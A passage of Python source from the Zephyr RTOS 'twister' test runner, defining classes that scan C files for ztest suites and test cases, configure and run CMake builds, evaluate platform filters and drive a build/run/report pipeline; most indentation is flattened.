# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
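        # A "supported" entry such as "netif:eth" (illustrative) contributes
        # both "netif" and "eth" to self.supported.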
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
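        # Names must contain at least one dot, e.g. "kernel.common" rather
        # than just "common".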
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # the testcase regex below to catch the ones that are declared in
            # the same line--as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
        Find regular ztest testcases like "ztest_unit_test" or similar. Return
        the testcase names and any warnings found.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
        argument. Return the testcase names and any warnings found.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
        Try to find the src directory containing the test source code. For
        optimization reasons it is sometimes placed in the parent directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
    @param testsuite The TestSuite object we want to build/execute
    @param platform Platform object that we want to build and run against
    @param outdir Base directory for all test results. The actual
    out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
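        # The resulting invocation resembles (illustrative):
        #   cmake -B<build_dir> -S<source_dir> -DTC_RUNID=<id> -DEXTRA_*=<flags>
        #         -G<generator> -D<extra args...> -DBOARD=<platform>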
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
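            # Generated .config lines look like CONFIG_FOO=y or
            # CONFIG_BAR="some value" (illustrative); anything else that is
            # not a comment is reported as unrecognized below.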
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
